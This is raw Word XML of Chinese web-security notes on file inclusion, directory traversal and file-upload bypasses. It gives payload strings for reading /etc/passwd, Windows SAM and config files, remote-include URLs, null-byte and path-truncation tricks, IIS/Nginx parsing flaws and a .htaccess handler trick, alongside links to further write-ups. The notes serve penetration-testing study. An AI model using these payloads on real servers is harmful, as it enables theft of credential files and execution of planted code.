        <w:t>文件包含</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D4E5C" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00C51675" w:rsidP="00BC34FC">
      <w:hyperlink r:id="rId88" w:history="1">
        <w:r w:rsidR="00BC34FC">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://thief.one/2017/04/10/2/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4933DB37" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="00BC34FC"/>
    <w:p w14:paraId="656DA4DF" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="00BC34FC"/>
    <w:p w14:paraId="3A5ADB53" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="00BC34FC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前提：需要开启</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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allow_url_fopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A9CD099" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00C51675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hyperlink r:id="rId89" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00BC34FC">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="0593D3"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://www.xxx.com/index.php?page=/etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BC34FC">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Windows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4770"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC34FC" w14:paraId="2ABA7C54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686D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53E21E8C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24BAD1EE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2E144E9C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5C188485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D7F4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boot.ini</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C898C39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systems32\inetsrv\MetaBase.xml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03D545B8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repair\sam</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27E0639C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php.ini             php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  <w:p w14:paraId="665A2140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 xml:space="preserve">c:\windows\my.ini               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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F406174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LINUX:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7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7810"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC34FC" w14:paraId="16C0B67B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8F28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156BE094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669348BB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3B5A2C43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0D60E9A0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4616" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="00B240C0">
            <w:pPr>
              <w:pStyle w:val="HTML"/>
              <w:shd w:val="clear" w:color="auto" w:fill="2D2D2D"/>
              <w:ind w:firstLineChars="3300" w:firstLine="660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  <w:p w14:paraId="4B60A537" w14:textId="77777777" w:rsidR="00B240C0" w:rsidRPr="00B240C0" w:rsidRDefault="00B240C0" w:rsidP="00BC34FC">
            <w:pPr>
              <w:pStyle w:val="HTML"/>
              <w:shd w:val="clear" w:color="auto" w:fill="2D2D2D"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="55AF060C" w14:textId="77777777" w:rsidR="00B240C0" w:rsidRPr="00B240C0" w:rsidRDefault="00B240C0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687D6BF" w14:textId="77777777" w:rsidR="00D54804" w:rsidRDefault="00D54804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144635CE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usr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r>
              <w:rPr>
                <w:rStyle w:val="builtin"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>loca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/app/apache2/conf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http.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="648AE033" w14:textId="77777777" w:rsidR="00D54804" w:rsidRDefault="00D54804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EC7DF7E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usr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r>
              <w:rPr>
                <w:rStyle w:val="builtin"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>loca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/app/php5/lib/php.ini          PHP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相关设置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D5ABE2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httpd/conf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http.conf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 xml:space="preserve">                    apache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  <w:p w14:paraId="642FBF09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my.cnf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 xml:space="preserve">                                              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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A2549F9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lastRenderedPageBreak/>
        <w:t>可以尝试访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId90" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="0593D3"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://www.xxx.com/1.jpg%00</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0393C5A1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（二）使用长目录截断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169"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC34FC" w14:paraId="2AD78EE4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61D1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50E26ED5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19C2CE67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617503E8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6123C7DA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D79A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././././././././././././.</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd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  <w:p w14:paraId="657A0DE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或者</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16734FE6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//////////////////////////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  <w:p w14:paraId="60CCF84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或者</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="325CBD5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proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/a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/../a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/../a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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A9178BA" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRPr="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="00BC34FC"/>
    <w:p w14:paraId="29D13E61" w14:textId="77777777" w:rsidR="00FA7087" w:rsidRDefault="00C51675" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId91" w:history="1">
        <w:r w:rsidR="00126765" w:rsidRPr="00971B05">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://bbs.ichunqiu.com/thread-54849-1-1.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B52DBAA" w14:textId="77777777" w:rsidR="00702405" w:rsidRPr="00702405" w:rsidRDefault="00C51675" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId92" w:history="1">
        <w:r w:rsidR="00702405">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.51cto.com/wt7315/1863177</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14C1ED17" w14:textId="77777777" w:rsidR="00126765" w:rsidRDefault="00C51675" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId93" w:history="1">
        <w:r w:rsidR="00702405">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.k0rz3n.com/2018/11/20/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8B%20PHP%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EB14725" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220354B3" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D50D0C" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRPr="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C628424" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录遍历</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A741971" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>几种经典的测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3300DF04" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w14:paraId="4378638F" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>?file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=../../../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwdd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C904D3F" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w14:paraId="46F06418" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:r>
        <w:t>?page=file:///etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3CD074" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w14:paraId="2B159C8D" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:r>
        <w:t>?home=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>main.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77239FB7" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w14:paraId="2CB32F29" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:r>
        <w:t>?page=http://www.a.com/1.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7124FF26" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w14:paraId="335D4B0B" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00C51675" w:rsidP="00982F28">
      <w:hyperlink r:id="rId94" w:history="1">
        <w:r w:rsidR="00982F28" w:rsidRPr="00335348">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://1.1.1.1/../../../../dir/file.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D14B0C0" w14:textId="77777777"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%00嵌入任意位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD81BA" w14:textId="77777777"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.的利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF69D75" w14:textId="77777777" w:rsidR="00982F28" w:rsidRPr="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w14:paraId="03033FAA" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件上传绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE0C0A" w14:textId="77777777" w:rsidR="009D12C4" w:rsidRDefault="00C51675" w:rsidP="009D12C4">
      <w:hyperlink r:id="rId95" w:history="1">
        <w:r w:rsidR="009D12C4" w:rsidRPr="007C08CC">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://freeerror.org/d/461</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009D12C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D12C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很全！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6610A6B6" w14:textId="77777777" w:rsidR="009D12C4" w:rsidRPr="009D12C4" w:rsidRDefault="009D12C4" w:rsidP="009D12C4"/>
    <w:p w14:paraId="27D8851C" w14:textId="77777777" w:rsidR="00B43685" w:rsidRDefault="00C51675" w:rsidP="00B43685">
      <w:hyperlink r:id="rId96" w:anchor="%E4%B8%80%E4%B8%AA%E5%8D%97%E9%82%AE%E7%9A%84CTF%E9%A2%98%E2%80%94%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87" w:history="1">
        <w:r w:rsidR="00B43685">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://j0k3r.top/2018/01/30/file-upload/#%E4%B8%80%E4%B8%AA%E5%8D%97%E9%82%AE%E7%9A%84CTF%E9%A2%98%E2%80%94%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B43685">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00B43685">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件包含文件上传的简单总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387759B7" w14:textId="77777777" w:rsidR="00B43685" w:rsidRPr="00B43685" w:rsidRDefault="00B43685" w:rsidP="00B43685"/>
    <w:p w14:paraId="55B99373" w14:textId="77777777" w:rsidR="00367951" w:rsidRPr="00367951" w:rsidRDefault="00C51675" w:rsidP="00367951">
      <w:hyperlink r:id="rId97" w:history="1">
        <w:r w:rsidR="00367951" w:rsidRPr="00076615">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.freebuf.com/articles/web/188464.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00367951">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00367951">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件上传fuzzy构造</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5A980A" w14:textId="77777777" w:rsidR="00702405" w:rsidRPr="00702405" w:rsidRDefault="00C51675" w:rsidP="00702405">
      <w:hyperlink r:id="rId98" w:history="1">
        <w:r w:rsidR="00702405">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.51cto.com/wt7315/1865580</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D879BBC" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:t>.文件名大小写绕过：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pHp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AsP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="066E6EEA" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103"/>
    <w:p w14:paraId="55A1C4F9" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:t>2.特殊文件名绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0E669D" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:t xml:space="preserve">  在Windows下有一个特性就是如果文件后缀以点‘.’或者空格‘ ’结尾的后缀 名时，系统在保存文件时会自动去除点和空格。但要注意 Unix/Linux 系统没有 这个特性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55836CED" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为有些服务器端的后缀名检测是取文件名最后一个</w:t>
      </w:r>
      <w:r>
        <w:t>.后面的字符串，拿这个字符串与黑名单列表对比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF69C69" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103"/>
    <w:p w14:paraId="68DB3997" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:t>3. 0x00截断绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3D40B4" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件名后缀有一个</w:t>
      </w:r>
      <w:r>
        <w:t>%00字节，可以截断某些函数对文件名的判断。在许多语言函 数中，处理字符串的函数中0x00被认为是终止符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E813FA" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r>
        <w:t>: 网站上传函数处理xxx.asp%00.jpg时，首先后缀名是合法的jpg格式，可以 上传，在保存文件时，遇到%00字符丢弃后面的 .jpg，文件后缀最终保存的后缀 名为xxx.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F534ECF" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="007F7103"/>
    <w:p w14:paraId="6A03581A" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:t>IS6.0有两个解析漏洞，一个是如果目录名包.asp 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字符串，那么这个目录下所有的文 件都会按照 asp 去解析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D57D5DC" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chaoasp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/1.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB4086D" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为文件名中有</w:t>
      </w:r>
      <w:r>
        <w:t>asp字样，所以该文件夹下的1.jpg文件打开时，会按照asp文件去解析执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB41D96" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B"/>
    <w:p w14:paraId="2EDFAAC2" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一个是只要文件名中含有</w:t>
      </w:r>
      <w:r>
        <w:t>.asp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会优先按 asp 来解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A68ED8" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B"/>
    <w:p w14:paraId="71C2E169" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:t>IIS7.0/7.5是对php解析时有一个类似于Nginx的解析漏洞， 对任意文件名只要在URL后面追加 上字符串“/任意文件名.php”就会按照 php 的方式去解析 。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4E7D64" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例子</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ：  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>”http://www.baidu.com/upload/chao/1.jpg/chao.php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2D5618" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>这种情况下访问</w:t>
      </w:r>
      <w:r>
        <w:t>1.jpg，该文件就会按照php格式被解析执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484CBEB8" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B"/>
    <w:p w14:paraId="433D772E" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:t>3.Nginx解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2811ED7D" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个是对任意文件名，在后面添加</w:t>
      </w:r>
      <w:r>
        <w:t>/任意文件名.php的解析漏洞，比如原本文件名是 test.jpg， 可以添加为 test.jpg/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>x.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 进行解析攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D09CB7" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一种是对低版本的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nginx 可以在任意文件名后面添加%00.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2818FD30" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t>127.0.0.1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-loads/load/chao.jpg%00.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B5D2B5" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:t>chao.jpg也就被当作php格式文件执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17615368" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="00C51675" w:rsidP="007F7103">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId99" w:history="1">
        <w:r w:rsidR="007F7103">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://paper.seebug.org/219/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BC9749B" w14:textId="77777777" w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="007F7103">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8B1E26" w14:textId="77777777" w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="00BC3FCD">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5610685A" w14:textId="77777777" w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="00BC3FCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>建一个.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 文件，里面的内容如下：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FilesMatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pino</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SetHandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> application/x-httpd-php</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FilesMatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
